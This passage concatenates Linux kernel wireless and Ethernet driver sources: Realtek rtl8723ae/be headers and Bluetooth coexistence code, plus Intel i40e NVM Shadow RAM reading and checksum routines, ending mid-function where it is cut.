#define DM_DIG_BACKOFF_DEFAULT 10
#define RXPATHSELECTION_SS_TH_LOW 30
#define RXPATHSELECTION_DIFF_TH 18
#define DM_RATR_STA_INIT 0
#define DM_RATR_STA_HIGH 1
#define DM_RATR_STA_MIDDLE 2
#define DM_RATR_STA_LOW 3
#define TXHIGHPWRLEVEL_NORMAL 0
#define TXHIGHPWRLEVEL_LEVEL1 1
#define TXHIGHPWRLEVEL_LEVEL2 2
#define TXHIGHPWRLEVEL_BT1 3
#define TXHIGHPWRLEVEL_BT2 4
#define DM_TYPE_BYDRIVER 1
#define TX_POWER_NEAR_FIELD_THRESH_LVL2 74
#define TX_POWER_NEAR_FIELD_THRESH_LVL1 67
struct swat_t {
u8 failure_cnt;
u8 try_flag;
u8 stop_trying;
long pre_rssi;
long trying_threshold;
u8 cur_antenna;
u8 pre_antenna;
};
enum tag_dynamic_init_gain_operation_type_definition {
DIG_TYPE_THRESH_HIGH = 0,
DIG_TYPE_THRESH_LOW = 1,
DIG_TYPE_BACKOFF = 2,
DIG_TYPE_RX_GAIN_MIN = 3,
DIG_TYPE_RX_GAIN_MAX = 4,
DIG_TYPE_ENABLE = 5,
DIG_TYPE_DISABLE = 6,
DIG_OP_TYPE_MAX
};
enum tag_cck_packet_detection_threshold_type_definition {
CCK_PD_STAGE_LowRssi = 0,
CCK_PD_STAGE_HighRssi = 1,
CCK_FA_STAGE_Low = 2,
CCK_FA_STAGE_High = 3,
CCK_PD_STAGE_MAX = 4,
};
enum dm_1r_cca_e {
CCA_1R = 0,
CCA_2R = 1,
CCA_MAX = 2,
};
enum dm_rf_e {
RF_SAVE = 0,
RF_NORMAL = 1,
RF_MAX = 2,
};
enum dm_sw_ant_switch_e {
ANS_ANTENNA_B = 1,
ANS_ANTENNA_A = 2,
ANS_ANTENNA_MAX = 3,
};
enum dm_dig_ext_port_alg_e {
DIG_EXT_PORT_STAGE_0 = 0,
DIG_EXT_PORT_STAGE_1 = 1,
DIG_EXT_PORT_STAGE_2 = 2,
DIG_EXT_PORT_STAGE_3 = 3,
DIG_EXT_PORT_STAGE_MAX = 4,
};
enum dm_dig_connect_e {
DIG_STA_DISCONNECT = 0,
DIG_STA_CONNECT = 1,
DIG_STA_BEFORE_CONNECT = 2,
DIG_MULTISTA_DISCONNECT = 3,
DIG_MULTISTA_CONNECT = 4,
DIG_CONNECT_MAX
};
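/* Undecorated smoothed signal strength: in ad-hoc (IBSS) mode the
 * per-entry minimum (entry_min_undec_sm_pwdb) is used, otherwise
 * undec_sm_pwdb.
 */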
#define GET_UNDECORATED_AVERAGE_RSSI(_priv) \
((((struct rtl_priv *)(_priv))->mac80211.opmode == \
NL80211_IFTYPE_ADHOC) ? \
(((struct rtl_priv *)(_priv))->dm.entry_min_undec_sm_pwdb) \
: (((struct rtl_priv *)(_priv))->dm.undec_sm_pwdb))
void rtl8723ae_dm_init(struct ieee80211_hw *hw);
void rtl8723ae_dm_watchdog(struct ieee80211_hw *hw);
void rtl8723ae_dm_write_dig(struct ieee80211_hw *hw);
void rtl8723ae_dm_init_rate_adaptive_mask(struct ieee80211_hw *hw);
void rtl8723ae_dm_rf_saving(struct ieee80211_hw *hw, u8 bforce_in_normal);
void rtl8723ae_dm_bt_coexist(struct ieee80211_hw *hw);
#endif
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723be/pwrseqcmd.h<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2014 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
*****************************************************************************/
#ifndef __RTL8723BE_PWRSEQCMD_H__
#define __RTL8723BE_PWRSEQCMD_H__
#include "../wifi.h"
/*---------------------------------------------*/
/*The value of cmd: 4 bits */
/*---------------------------------------------*/
#define PWR_CMD_READ 0x00
#define PWR_CMD_WRITE 0x01
#define PWR_CMD_POLLING 0x02
#define PWR_CMD_DELAY 0x03
#define PWR_CMD_END 0x04
/* define the base address of each block */
#define PWR_BASEADDR_MAC 0x00
#define PWR_BASEADDR_USB 0x01
#define PWR_BASEADDR_PCIE 0x02
#define PWR_BASEADDR_SDIO 0x03
#define PWR_INTF_SDIO_MSK BIT(0)
#define PWR_INTF_USB_MSK BIT(1)
#define PWR_INTF_PCI_MSK BIT(2)
#define PWR_INTF_ALL_MSK (BIT(0) | BIT(1) | BIT(2) | BIT(3))
#define PWR_FAB_TSMC_MSK BIT(0)
#define PWR_FAB_UMC_MSK BIT(1)
#define PWR_FAB_ALL_MSK (BIT(0) | BIT(1) | BIT(2) | BIT(3))
#define PWR_CUT_TESTCHIP_MSK BIT(0)
#define PWR_CUT_A_MSK BIT(1)
#define PWR_CUT_B_MSK BIT(2)
#define PWR_CUT_C_MSK BIT(3)
#define PWR_CUT_D_MSK BIT(4)
#define PWR_CUT_E_MSK BIT(5)
#define PWR_CUT_F_MSK BIT(6)
#define PWR_CUT_G_MSK BIT(7)
#define PWR_CUT_ALL_MSK 0xFF
enum pwrseq_delay_unit {
PWRSEQ_DELAY_US,
PWRSEQ_DELAY_MS,
};
struct wlan_pwr_cfg {
u16 offset;
u8 cut_msk;
u8 fab_msk:4;
u8 interface_msk:4;
u8 base:4;
u8 cmd:4;
u8 msk;
u8 value;
};
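/* Each wlan_pwr_cfg entry describes one step of a power sequence: the
 * register at 'offset' within the block selected by 'base' is acted on
 * with 'cmd' (read/write/polling/delay/end) using 'msk' and 'value', but
 * only when the entry's cut/fab/interface masks match the running chip.
 */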
#define GET_PWR_CFG_OFFSET(__PWR_CMD) __PWR_CMD.offset
#define GET_PWR_CFG_CUT_MASK(__PWR_CMD) __PWR_CMD.cut_msk
#define GET_PWR_CFG_FAB_MASK(__PWR_CMD) __PWR_CMD.fab_msk
#define GET_PWR_CFG_INTF_MASK(__PWR_CMD) __PWR_CMD.interface_msk
#define GET_PWR_CFG_BASE(__PWR_CMD) __PWR_CMD.base
#define GET_PWR_CFG_CMD(__PWR_CMD) __PWR_CMD.cmd
#define GET_PWR_CFG_MASK(__PWR_CMD) __PWR_CMD.msk
#define GET_PWR_CFG_VALUE(__PWR_CMD) __PWR_CMD.value
bool rtlbe_hal_pwrseqcmdparsing(struct rtl_priv *rtlpriv, u8 cut_version,
u8 fab_version, u8 interface_type,
struct wlan_pwr_cfg pwrcfgcmd[]);
#endif
<|start_filename|>linux-3.16/drivers/net/ethernet/intel/i40e/i40e_nvm.c<|end_filename|>
/*******************************************************************************
*
* Intel Ethernet Controller XL710 Family Linux Driver
* Copyright(c) 2013 - 2014 Intel Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms and conditions of the GNU General Public License,
* version 2, as published by the Free Software Foundation.
*
* This program is distributed in the hope it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*
* The full GNU General Public License is included in this distribution in
* the file called "COPYING".
*
* Contact Information:
* e1000-devel Mailing List <<EMAIL>>
* Intel Corporation, 5200 N.E. El<NAME> Parkway, Hillsboro, OR 97124-6497
*
******************************************************************************/
#include "i40e_prototype.h"
/**
 * i40e_init_nvm - Initialize NVM state
* @hw: pointer to the HW structure
*
 * Set up the NVM info structure. Should be called once per NVM
 * initialization, e.g. inside the i40e_init_shared_code().
 * Note that the term NVM is used here (and in all methods covered in this
 * file) as an equivalent of the FLASH part mapped into the SR; the FLASH
 * is always accessed through the Shadow RAM.
**/
i40e_status i40e_init_nvm(struct i40e_hw *hw)
{
struct i40e_nvm_info *nvm = &hw->nvm;
i40e_status ret_code = 0;
u32 fla, gens;
u8 sr_size;
/* The SR size is stored regardless of the nvm programming mode
* as the blank mode may be used in the factory line.
*/
gens = rd32(hw, I40E_GLNVM_GENS);
sr_size = ((gens & I40E_GLNVM_GENS_SR_SIZE_MASK) >>
I40E_GLNVM_GENS_SR_SIZE_SHIFT);
	/* Switching to words (sr_size holds the log2 of the Shadow RAM size in KB) */
nvm->sr_size = (1 << sr_size) * I40E_SR_WORDS_IN_1KB;
/* Check if we are in the normal or blank NVM programming mode */
fla = rd32(hw, I40E_GLNVM_FLA);
if (fla & I40E_GLNVM_FLA_LOCKED_MASK) { /* Normal programming mode */
/* Max NVM timeout */
nvm->timeout = I40E_MAX_NVM_TIMEOUT;
nvm->blank_nvm_mode = false;
} else { /* Blank programming mode */
nvm->blank_nvm_mode = true;
ret_code = I40E_ERR_NVM_BLANK_MODE;
hw_dbg(hw, "NVM init error: unsupported blank mode.\n");
}
return ret_code;
}
/**
* i40e_acquire_nvm - Generic request for acquiring the NVM ownership
* @hw: pointer to the HW structure
* @access: NVM access type (read or write)
*
 * This function requests NVM ownership for the given access type
 * (read or write) via the proper Admin Command.
**/
i40e_status i40e_acquire_nvm(struct i40e_hw *hw,
enum i40e_aq_resource_access_type access)
{
i40e_status ret_code = 0;
u64 gtime, timeout;
u64 time = 0;
if (hw->nvm.blank_nvm_mode)
goto i40e_i40e_acquire_nvm_exit;
ret_code = i40e_aq_request_resource(hw, I40E_NVM_RESOURCE_ID, access,
0, &time, NULL);
/* Reading the Global Device Timer */
gtime = rd32(hw, I40E_GLVFGEN_TIMER);
/* Store the timeout */
hw->nvm.hw_semaphore_timeout = I40E_MS_TO_GTIME(time) + gtime;
if (ret_code) {
/* Set the polling timeout */
if (time > I40E_MAX_NVM_TIMEOUT)
timeout = I40E_MS_TO_GTIME(I40E_MAX_NVM_TIMEOUT)
+ gtime;
else
timeout = hw->nvm.hw_semaphore_timeout;
/* Poll until the current NVM owner timeouts */
while (gtime < timeout) {
usleep_range(10000, 20000);
ret_code = i40e_aq_request_resource(hw,
I40E_NVM_RESOURCE_ID,
access, 0, &time,
NULL);
if (!ret_code) {
hw->nvm.hw_semaphore_timeout =
I40E_MS_TO_GTIME(time) + gtime;
break;
}
gtime = rd32(hw, I40E_GLVFGEN_TIMER);
}
if (ret_code) {
hw->nvm.hw_semaphore_timeout = 0;
hw->nvm.hw_semaphore_wait =
I40E_MS_TO_GTIME(time) + gtime;
hw_dbg(hw, "NVM acquire timed out, wait %llu ms before trying again.\n",
time);
}
}
i40e_i40e_acquire_nvm_exit:
return ret_code;
}
/**
* i40e_release_nvm - Generic request for releasing the NVM ownership
* @hw: pointer to the HW structure
*
* This function will release NVM resource via the proper Admin Command.
**/
void i40e_release_nvm(struct i40e_hw *hw)
{
if (!hw->nvm.blank_nvm_mode)
i40e_aq_release_resource(hw, I40E_NVM_RESOURCE_ID, 0, NULL);
}
/**
* i40e_poll_sr_srctl_done_bit - Polls the GLNVM_SRCTL done bit
* @hw: pointer to the HW structure
*
* Polls the SRCTL Shadow RAM register done bit.
**/
static i40e_status i40e_poll_sr_srctl_done_bit(struct i40e_hw *hw)
{
i40e_status ret_code = I40E_ERR_TIMEOUT;
u32 srctl, wait_cnt;
/* Poll the I40E_GLNVM_SRCTL until the done bit is set */
for (wait_cnt = 0; wait_cnt < I40E_SRRD_SRCTL_ATTEMPTS; wait_cnt++) {
srctl = rd32(hw, I40E_GLNVM_SRCTL);
if (srctl & I40E_GLNVM_SRCTL_DONE_MASK) {
ret_code = 0;
break;
}
udelay(5);
}
if (ret_code == I40E_ERR_TIMEOUT)
hw_dbg(hw, "Done bit in GLNVM_SRCTL not set\n");
return ret_code;
}
/**
* i40e_read_nvm_word - Reads Shadow RAM
* @hw: pointer to the HW structure
* @offset: offset of the Shadow RAM word to read (0x000000 - 0x001FFF)
* @data: word read from the Shadow RAM
*
* Reads one 16 bit word from the Shadow RAM using the GLNVM_SRCTL register.
**/
i40e_status i40e_read_nvm_word(struct i40e_hw *hw, u16 offset,
u16 *data)
{
i40e_status ret_code = I40E_ERR_TIMEOUT;
u32 sr_reg;
if (offset >= hw->nvm.sr_size) {
hw_dbg(hw, "NVM read error: Offset beyond Shadow RAM limit.\n");
ret_code = I40E_ERR_PARAM;
goto read_nvm_exit;
}
/* Poll the done bit first */
ret_code = i40e_poll_sr_srctl_done_bit(hw);
if (!ret_code) {
/* Write the address and start reading */
sr_reg = (u32)(offset << I40E_GLNVM_SRCTL_ADDR_SHIFT) |
(1 << I40E_GLNVM_SRCTL_START_SHIFT);
wr32(hw, I40E_GLNVM_SRCTL, sr_reg);
/* Poll I40E_GLNVM_SRCTL until the done bit is set */
ret_code = i40e_poll_sr_srctl_done_bit(hw);
if (!ret_code) {
sr_reg = rd32(hw, I40E_GLNVM_SRDATA);
*data = (u16)((sr_reg &
I40E_GLNVM_SRDATA_RDDATA_MASK)
>> I40E_GLNVM_SRDATA_RDDATA_SHIFT);
}
}
if (ret_code)
hw_dbg(hw, "NVM read error: Couldn't access Shadow RAM address: 0x%x\n",
offset);
read_nvm_exit:
return ret_code;
}
/**
* i40e_read_nvm_buffer - Reads Shadow RAM buffer
* @hw: pointer to the HW structure
* @offset: offset of the Shadow RAM word to read (0x000000 - 0x001FFF).
* @words: (in) number of words to read; (out) number of words actually read
* @data: words read from the Shadow RAM
*
 * Reads 16 bit words (data buffer) from the SR one word at a time using
 * the i40e_read_nvm_word() method; this function itself does not take or
 * release NVM ownership.
**/
i40e_status i40e_read_nvm_buffer(struct i40e_hw *hw, u16 offset,
u16 *words, u16 *data)
{
i40e_status ret_code = 0;
u16 index, word;
	/* Loop through the selected region */
for (word = 0; word < *words; word++) {
index = offset + word;
ret_code = i40e_read_nvm_word(hw, index, &data[word]);
if (ret_code)
break;
}
/* Update the number of words read from the Shadow RAM */
*words = word;
return ret_code;
}
/**
* i40e_calc_nvm_checksum - Calculates and returns the checksum
* @hw: pointer to hardware structure
* @checksum: pointer to the checksum
*
* This function calculates SW Checksum that covers the whole 64kB shadow RAM
* except the VPD and PCIe ALT Auto-load modules. The structure and size of VPD
 * is customer specific and unknown. Therefore, this function skips the
 * maximum possible size of the VPD module (1kB).
**/
static i40e_status i40e_calc_nvm_checksum(struct i40e_hw *hw,
u16 *checksum)
{
i40e_status ret_code = 0;
u16 pcie_alt_module = 0;
u16 checksum_local = 0;
u16 vpd_module = 0;
u16 word = 0;
u32 i = 0;
/* read pointer to VPD area */
ret_code = i40e_read_nvm_word(hw, I40E_SR_VPD_PTR, &vpd_module);
if (ret_code) {
ret_code = I40E_ERR_NVM_CHECKSUM;
goto i40e_calc_nvm_checksum_exit;
}
/* read pointer to PCIe Alt Auto-load module */
ret_code = i40e_read_nvm_word(hw, I40E_SR_PCIE_ALT_AUTO_LOAD_PTR,
&pcie_alt_module);
if (ret_code) {
ret_code = I40E_ERR_NVM_CHECKSUM;
goto i40e_calc_nvm_checksum_exit;
}
/* Calculate SW checksum that covers the whole 64kB shadow RAM
* except the VPD and PCIe ALT Auto-load modules
*/
for (i = 0; i < hw->nvm.sr_size; i++) {
/* Skip Checksum word */
if (i == I40E_SR_SW_CHECKSUM_WORD)
i++;
/* Skip VPD module (convert byte size to word count) */
if (i == (u32)vpd_module) {
i += (I40E_SR_VPD_MODULE_MAX_SIZE / 2);
if (i >= hw->nvm.sr_size)
break;
}
/* Skip PCIe ALT module (convert byte size to word count) */
if (i == (u32)pcie_alt_module) {
i += (I40E_SR_PCIE_ALT_MODULE_MAX_SIZE / 2);
if (i >= hw->nvm.sr_size)
break;
}
ret_code = i40e_read_nvm_word(hw, (u16)i, &word);
if (ret_code) {
ret_code = I40E_ERR_NVM_CHECKSUM;
goto i40e_calc_nvm_checksum_exit;
}
checksum_local += word;
}
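	/* The stored checksum word is defined so that it plus the sum of all
	 * other (non-skipped) words equals I40E_SR_SW_CHECKSUM_BASE mod 2^16.
	 */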
*checksum = (u16)I40E_SR_SW_CHECKSUM_BASE - checksum_local;
i40e_calc_nvm_checksum_exit:
return ret_code;
}
/**
* i40e_validate_nvm_checksum - Validate EEPROM checksum
* @hw: pointer to hardware structure
* @checksum: calculated checksum
*
* Performs checksum calculation and validates the NVM SW checksum. If the
* caller does not need checksum, the value can be NULL.
**/
i40e_status i40e_validate_nvm_checksum(struct i40e_hw *hw,
u16 *checksum)
{
i40e_status ret_code = 0;
u16 checksum_sr = 0;
u16 checksum_local = 0;
ret_code = i40e_acquire_nvm(hw, I40E_RESOURCE_READ);
if (ret_code)
goto i40e_validate_nvm_checksum_exit;
ret_code = i40e_calc_nvm_checksum(hw, &checksum_local);
if (ret_code)
goto i40e_validate_nvm_checksum_free;
/* Do not use i40e_read_nvm_word() because we do not want to take
* the synchronization semaphores twice here.
*/
i40e_read_nvm_word(hw, I40E_SR_SW_CHECKSUM_WORD, &checksum_sr);
/* Verify read checksum from EEPROM is the same as
* calculated checksum
*/
if (checksum_local != checksum_sr)
ret_code = I40E_ERR_NVM_CHECKSUM;
/* If the user cares, return the calculated checksum */
if (checksum)
*checksum = checksum_local;
i40e_validate_nvm_checksum_free:
i40e_release_nvm(hw);
i40e_validate_nvm_checksum_exit:
return ret_code;
}
<|start_filename|>linux-3.16/drivers/net/wireless/rtlwifi/rtl8723ae/hal_btc.c<|end_filename|>
/******************************************************************************
*
* Copyright(c) 2009-2012 Realtek Corporation.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along with
* this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110, USA
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <<EMAIL>>
* Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park,
* Hsinchu 300, Taiwan.
*
* <NAME> <<EMAIL>>
*
****************************************************************************
*/
#include "hal_btc.h"
#include "../pci.h"
#include "phy.h"
#include "../rtl8723com/phy_common.h"
#include "fw.h"
#include "../rtl8723com/fw_common.h"
#include "reg.h"
#include "def.h"
void rtl8723ae_bt_coex_off_before_lps(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_ps_ctl *ppsc = rtl_psc(rtl_priv(hw));
if (!rtlpcipriv->bt_coexist.bt_coexistence)
return;
if (ppsc->inactiveps) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BT][DM], Before enter IPS, turn off all Coexist DM\n");
rtlpcipriv->bt_coexist.cstate = 0;
rtlpcipriv->bt_coexist.previous_state = 0;
rtlpcipriv->bt_coexist.cstate_h = 0;
rtlpcipriv->bt_coexist.previous_state_h = 0;
rtl8723ae_btdm_coex_all_off(hw);
}
}
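/* Report RT_MEDIA_CONNECT when the interface operates in ad-hoc mode or
 * the mac80211 link state says we are at least linked, otherwise
 * RT_MEDIA_DISCONNECT.
 */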
static enum _RT_MEDIA_STATUS mgnt_link_status_query(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_mac *mac = rtl_mac(rtl_priv(hw));
enum _RT_MEDIA_STATUS m_status = RT_MEDIA_DISCONNECT;
u8 bibss = (mac->opmode == NL80211_IFTYPE_ADHOC) ? 1 : 0;
if (bibss || rtlpriv->mac80211.link_state >= MAC80211_LINKED)
m_status = RT_MEDIA_CONNECT;
return m_status;
}
void rtl_8723e_bt_wifi_media_status_notify(struct ieee80211_hw *hw,
bool mstatus)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_phy *rtlphy = &(rtlpriv->phy);
u8 h2c_parameter[3] = {0};
u8 chnl;
if (!rtlpcipriv->bt_coexist.bt_coexistence)
return;
if (RT_MEDIA_CONNECT == mstatus)
h2c_parameter[0] = 0x1; /* 0: disconnected, 1:connected */
else
h2c_parameter[0] = 0x0;
if (mgnt_link_status_query(hw)) {
chnl = rtlphy->current_channel;
h2c_parameter[1] = chnl;
}
if (rtlphy->current_chan_bw == HT_CHANNEL_WIDTH_20_40)
h2c_parameter[2] = 0x30;
else
h2c_parameter[2] = 0x20;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], FW write 0x19 = 0x%x\n",
h2c_parameter[0]<<16|h2c_parameter[1]<<8|h2c_parameter[2]);
rtl8723ae_fill_h2c_cmd(hw, 0x19, 3, h2c_parameter);
}
static bool rtl8723ae_dm_bt_is_wifi_busy(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
if (rtlpriv->link_info.busytraffic ||
rtlpriv->link_info.rx_busy_traffic ||
rtlpriv->link_info.tx_busy_traffic)
return true;
else
return false;
}
static void rtl8723ae_dm_bt_set_fw_3a(struct ieee80211_hw *hw,
u8 byte1, u8 byte2, u8 byte3,
u8 byte4, u8 byte5)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[5] = {0};
h2c_parameter[0] = byte1;
h2c_parameter[1] = byte2;
h2c_parameter[2] = byte3;
h2c_parameter[3] = byte4;
h2c_parameter[4] = byte5;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], FW write 0x3a(4bytes) = 0x%x%8x\n",
h2c_parameter[0], h2c_parameter[1]<<24 | h2c_parameter[2]<<16 |
h2c_parameter[3]<<8 | h2c_parameter[4]);
rtl8723ae_fill_h2c_cmd(hw, 0x3a, 5, h2c_parameter);
}
static bool rtl8723ae_dm_bt_need_to_dec_bt_pwr(struct ieee80211_hw *hw)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
if (mgnt_link_status_query(hw) == RT_MEDIA_CONNECT) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Need to decrease bt power\n");
rtlpcipriv->bt_coexist.cstate |= BT_COEX_STATE_DEC_BT_POWER;
return true;
}
rtlpcipriv->bt_coexist.cstate &= ~BT_COEX_STATE_DEC_BT_POWER;
return false;
}
static bool rtl8723ae_dm_bt_is_same_coexist_state(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
if ((rtlpcipriv->bt_coexist.previous_state ==
rtlpcipriv->bt_coexist.cstate) &&
(rtlpcipriv->bt_coexist.previous_state_h ==
rtlpcipriv->bt_coexist.cstate_h)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[DM][BT], Coexist state do not chang!!\n");
return true;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[DM][BT], Coexist state changed!!\n");
return false;
}
}
static void rtl8723ae_dm_bt_set_coex_table(struct ieee80211_hw *hw,
u32 val_0x6c0, u32 val_0x6c8,
u32 val_0x6cc)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"set coex table, set 0x6c0 = 0x%x\n", val_0x6c0);
rtl_write_dword(rtlpriv, 0x6c0, val_0x6c0);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"set coex table, set 0x6c8 = 0x%x\n", val_0x6c8);
rtl_write_dword(rtlpriv, 0x6c8, val_0x6c8);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"set coex table, set 0x6cc = 0x%x\n", val_0x6cc);
rtl_write_byte(rtlpriv, 0x6cc, val_0x6cc);
}
static void rtl8723ae_dm_bt_set_hw_pta_mode(struct ieee80211_hw *hw, bool mode)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
if (BT_PTA_MODE_ON == mode) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE, "PTA mode on, ");
/* Enable GPIO 0/1/2/3/8 pins for bt */
rtl_write_byte(rtlpriv, 0x40, 0x20);
rtlpcipriv->bt_coexist.hw_coexist_all_off = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE, "PTA mode off\n");
rtl_write_byte(rtlpriv, 0x40, 0x0);
}
}
static void rtl8723ae_dm_bt_set_sw_rf_rx_lpf_corner(struct ieee80211_hw *hw,
u8 type)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
if (BT_RF_RX_LPF_CORNER_SHRINK == type) {
/* Shrink RF Rx LPF corner, 0x1e[7:4]=1111 ==> [11:4] by Jenyu*/
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"Shrink RF Rx LPF corner!!\n");
rtl8723ae_phy_set_rf_reg(hw, RF90_PATH_A, 0x1e, 0xfffff,
0xf0ff7);
rtlpcipriv->bt_coexist.sw_coexist_all_off = false;
} else if (BT_RF_RX_LPF_CORNER_RESUME == type) {
/*Resume RF Rx LPF corner*/
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"Resume RF Rx LPF corner!!\n");
rtl8723ae_phy_set_rf_reg(hw, RF90_PATH_A, 0x1e, 0xfffff,
rtlpcipriv->bt_coexist.bt_rfreg_origin_1e);
}
}
static void rtl8723ae_bt_set_penalty_tx_rate_adap(struct ieee80211_hw *hw,
u8 ra_type)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u8 tmu1;
tmu1 = rtl_read_byte(rtlpriv, 0x4fd);
tmu1 |= BIT(0);
if (BT_TX_RATE_ADAPTIVE_LOW_PENALTY == ra_type) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"Tx rate adaptive, set low penalty!!\n");
tmu1 &= ~BIT(2);
rtlpcipriv->bt_coexist.sw_coexist_all_off = false;
} else if (BT_TX_RATE_ADAPTIVE_NORMAL == ra_type) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"Tx rate adaptive, set normal!!\n");
tmu1 |= BIT(2);
}
rtl_write_byte(rtlpriv, 0x4fd, tmu1);
}
static void rtl8723ae_dm_bt_btdm_structure_reload(struct ieee80211_hw *hw,
struct btdm_8723 *btdm)
{
btdm->all_off = false;
btdm->agc_table_en = false;
btdm->adc_back_off_on = false;
btdm->b2_ant_hid_en = false;
btdm->low_penalty_rate_adaptive = false;
btdm->rf_rx_lpf_shrink = false;
btdm->reject_aggre_pkt = false;
btdm->tdma_on = false;
btdm->tdma_ant = TDMA_2ANT;
btdm->tdma_nav = TDMA_NAV_OFF;
btdm->tdma_dac_swing = TDMA_DAC_SWING_OFF;
btdm->fw_dac_swing_lvl = 0x20;
btdm->tra_tdma_on = false;
btdm->tra_tdma_ant = TDMA_2ANT;
btdm->tra_tdma_nav = TDMA_NAV_OFF;
btdm->ignore_wlan_act = false;
btdm->ps_tdma_on = false;
btdm->ps_tdma_byte[0] = 0x0;
btdm->ps_tdma_byte[1] = 0x0;
btdm->ps_tdma_byte[2] = 0x0;
btdm->ps_tdma_byte[3] = 0x8;
btdm->ps_tdma_byte[4] = 0x0;
btdm->pta_on = true;
btdm->val_0x6c0 = 0x5a5aaaaa;
btdm->val_0x6c8 = 0xcc;
btdm->val_0x6cc = 0x3;
btdm->sw_dac_swing_on = false;
btdm->sw_dac_swing_lvl = 0xc0;
btdm->wlan_act_hi = 0x20;
btdm->wlan_act_lo = 0x10;
btdm->bt_retry_index = 2;
btdm->dec_bt_pwr = false;
}
static void dm_bt_btdm_structure_reload_all_off(struct ieee80211_hw *hw,
struct btdm_8723 *btdm)
{
rtl8723ae_dm_bt_btdm_structure_reload(hw, btdm);
btdm->all_off = true;
btdm->pta_on = false;
btdm->wlan_act_hi = 0x10;
}
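/* Handle the "common" 2-antenna cases (wifi/BT idle combinations).
 * Returns true if a common action was taken, false if a
 * profile-specific action is required.
 */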
static bool rtl8723ae_dm_bt_is_2_ant_common_action(struct ieee80211_hw *hw)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct btdm_8723 btdm8723;
bool common = false;
rtl8723ae_dm_bt_btdm_structure_reload(hw, &btdm8723);
if (!rtl8723ae_dm_bt_is_wifi_busy(hw)
&& !rtlpcipriv->bt_coexist.bt_busy) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi idle + Bt idle, bt coex mechanism always off!!\n");
dm_bt_btdm_structure_reload_all_off(hw, &btdm8723);
common = true;
} else if (rtl8723ae_dm_bt_is_wifi_busy(hw)
&& !rtlpcipriv->bt_coexist.bt_busy) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi non-idle + Bt disabled/idle!!\n");
btdm8723.low_penalty_rate_adaptive = true;
btdm8723.rf_rx_lpf_shrink = false;
btdm8723.reject_aggre_pkt = false;
/* sw mechanism */
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = false;
btdm8723.sw_dac_swing_on = false;
btdm8723.pta_on = true;
